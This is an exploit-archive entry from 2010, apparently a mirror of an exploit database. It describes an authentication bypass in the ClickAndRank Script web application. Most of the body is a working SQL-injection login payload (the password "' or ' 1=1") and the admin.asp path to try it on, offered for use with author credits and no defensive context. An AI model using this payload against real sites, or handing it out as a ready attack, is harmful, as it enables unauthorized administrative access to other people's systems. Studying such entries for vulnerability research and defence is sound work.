ClickAndRank Script Authentication Bypass

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : ClickAndRank Script Authentication Bypass
# Published : 2010-07-18
# Author : walid
# Previous Title : Joomla Component (com_staticxt) SQL Injection Vulnerability
# Next Title : Kayako eSupport (functions.php) v3.70.02 SQL Injection Vulnerability

# Exploit Title: ClickAndRank Script Authentication Bypass
# Date: [18/07/2010]
# Author: [walid]
# Software Link: [null]
# Version: [null]
# Tested on: [Windows]
# CVE: [null]

* Found By: WaLiD
* E-mail: Rezultas[at]Gmail[Dot]com
* GreeTZ: [Amine]/[v4-team.com]/[Madjix]
 
---------------------------------------------------------
Vendor: http://www.icash.ch/index.html?ClickAndRank/details.asp
---------------------------------------------------------
 
Exploit Auth Bypass:

login: walid
passw: ' or ' 1=1
 
----------------------------------------------------------
 
-[!]

Demo :
http://<site>/index.html?ClickAndRank/admin.asp
 
----------------------------------------------------------